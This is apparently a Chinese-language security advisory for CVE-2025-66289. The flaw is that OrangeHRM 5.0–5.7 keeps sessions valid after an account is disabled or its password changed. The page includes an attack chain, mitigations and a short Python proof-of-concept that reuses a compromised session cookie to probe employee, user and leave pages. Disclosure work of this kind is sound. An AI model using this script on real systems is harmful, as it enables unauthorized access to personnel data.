CVE-2025-66289 OrangeHRM会话未正确失效导致账户禁用失效

漏洞信息

漏洞编号

CVE-2025-66289

漏洞类型

会话管理漏洞

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OrangeHRM

漏洞概述

CVE-2025-66289是OrangeHRM人力资源管理系统中的一个高危安全漏洞。该漏洞存在于OrangeHRM 5.0至5.7版本中，核心问题是应用程序在用户被禁用或密码更改时未能正确失效现有的会话。当用户账户被管理员禁用或用户主动修改密码后，已经建立的会话cookie仍然保持有效状态，攻击者可以继续使用这些有效的会话cookie访问系统受保护的页面和执行各种操作。由于服务器在关键状态变更期间未执行会话撤销或会话存储清理操作，禁用账户或更新凭证对已建立的会话没有任何影响。这使得管理员的账户禁用操作完全失效，攻击者即使在账户被关闭或密码被重置后仍能保留完整的系统访问权限。该漏洞显著增加了账户被入侵后的影响范围和持续时间，为攻击者提供了长期未授权访问系统的能力。

技术细节

OrangeHRM 5.0-5.7版本在会话管理机制上存在设计缺陷。当系统接收到用户禁用请求或密码修改请求时，后端代码仅更新数据库中的用户状态字段和凭证信息，但未触发会话存储的清理机制。具体来说，系统未调用会话销毁函数来清除当前活跃的会话标识符，也未从会话存储（如数据库或Redis）中删除对应的会话记录。此外，系统未在会话验证流程中增加对用户账户状态的二次检查逻辑，导致已建立的会话在有效期内可以绕过账户状态验证。攻击者只需要获取一个在账户禁用前建立的会话cookie，即可在账户被禁用后继续以该用户身份访问系统，执行特权操作如查看敏感员工信息、修改薪资数据等。漏洞的修复需要版本5.8，在用户状态变更时主动遍历并失效相关的会话记录。

攻击链分析

STEP 1

初始访问

攻击者通过钓鱼攻击、凭证填充或社会工程学手段获取有效用户账户的会话cookie

STEP 2

权限维持

攻击者使用获取的会话cookie访问系统，建立持久化连接

STEP 3

账户状态变更

管理员发现可疑活动，禁用该用户账户或用户主动修改密码

STEP 4

会话劫持持续

由于漏洞存在，被禁用账户的会话cookie仍然有效，攻击者继续使用原session保持访问

STEP 5

未授权操作

攻击者在账户被禁用后仍能访问敏感数据、执行特权操作，可能造成数据泄露或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66289 PoC - OrangeHRM Session Not Invalidated
# This PoC demonstrates the session invalidation vulnerability

import requests
import hashlib

TARGET_URL = "http://target-orangehrm.com"
TARGET_URL = "https://example-orangehrm.com"

def exploit_session_not_invalidated():
    """
    Attack scenario:
    1. Attacker obtains a valid session cookie (e.g., from compromised account)
    2. Admin disables the user account
    3. Attacker continues using the same session cookie
    4. Session remains valid and access is granted
    """
    
    # Step 1: Obtain a valid session cookie (e.g., via phishing, credential stuffing)
    session_cookie = "your_compromised_session_cookie_here"
    
    headers = {
        "Cookie": f"PHPSESSID={session_cookie}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    # Step 2: Verify session works before account disable
    response = requests.get(f"{TARGET_URL}/symfony/web/index.php/dashboard", headers=headers)
    print(f"[*] Session status before disable: {response.status_code}")
    
    # Step 3: After admin disables account, session should be invalid but isn't
    response = requests.get(f"{TARGET_URL}/symfony/web/index.php/dashboard", headers=headers)
    if response.status_code == 200:
        print("[!] VULNERABLE: Session still valid after account disable!")
        print("[!] Attacker retains access even after account is disabled")
        
        # Step 4: Continue exploiting the valid session
        # Access sensitive endpoints
        sensitive_endpoints = [
            "/symfony/web/index.php/pim/viewEmployeeList",
            "/symfony/web/index.php/admin/viewSystemUsers",
            "/symfony/web/index.php/leave/viewLeaveRequest"
        ]
        
        for endpoint in sensitive_endpoints:
            resp = requests.get(f"{TARGET_URL}{endpoint}", headers=headers)
            if resp.status_code == 200:
                print(f"[+] Accessed: {endpoint}")
    else:
        print("[-] Session properly invalidated (patched version)")

if __name__ == "__main__":
    exploit_session_not_invalidated()

影响范围

OrangeHRM 5.0

OrangeHRM 5.1

OrangeHRM 5.2

OrangeHRM 5.3

OrangeHRM 5.4

OrangeHRM 5.5

OrangeHRM 5.6

OrangeHRM 5.7

防御指南

临时缓解措施

如果无法立即升级到5.8版本，建议采取以下临时措施：1)监控和手动清理可疑会话；2)增加账户异常登录检测；3)缩短会话超时时间；4)定期强制所有用户重新登录；5)对敏感操作实施额外的多因素认证验证。